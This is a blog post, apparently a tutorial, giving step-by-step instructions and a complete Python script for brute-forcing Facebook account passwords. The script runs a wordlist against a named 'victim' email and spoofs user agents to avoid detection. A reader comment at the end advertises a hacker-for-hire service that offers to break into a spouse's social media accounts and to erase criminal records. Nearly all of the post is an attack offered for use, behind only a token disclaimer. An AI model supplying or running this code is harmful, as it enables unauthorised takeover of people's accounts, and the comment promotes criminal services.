1) go to privilege escalation then select online attacks and then select hydra
2) then use python script for the brute force attack you can attack the victim only when he is in online
3) get the python script
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : krishna_ <krishnakumar.m13@gmail.com>
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
__programmer__ = "gunslinger_ <yudha.gunslinger@gmail.com>"
__version__ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username <username> | User for bruteforcing
-w, --wordlist <filename> | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy <host:port> | Set http proxy will be use
-k, --usernameproxy <username> | Set username at proxy will be use
-i, --passproxy <password> | Set password at proxy will be use
-l, --log <filename> | Specify output filename (default : fbbruteforcer.log)
-h, --help <help> | Print this help
Example : %s -u brad@hackme.com -w wordlist.txt"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)
def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()
if __name__ == '__main__':
main()
4) then create a new file and upload this code and save it as facebookbruteforce.py
5) then put python facebookbruteforce.py
6) then put python facebookbruteforce.py -h
7) now you write your victim mail id facebookbruteforce.py -u krishnakumar.m13@gmail.com -w wordlist.txt
8) because we have to create a word list and upload that after that it will brute force the particular email and the password will be found in password.txt file
1 comments:
Do you need to increase your credit score?
ReplyDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com
Post a Comment